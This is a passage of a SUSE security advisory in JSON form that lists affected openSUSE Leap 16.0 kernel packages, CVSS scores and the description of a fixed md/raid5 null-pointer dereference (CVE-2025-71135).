"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
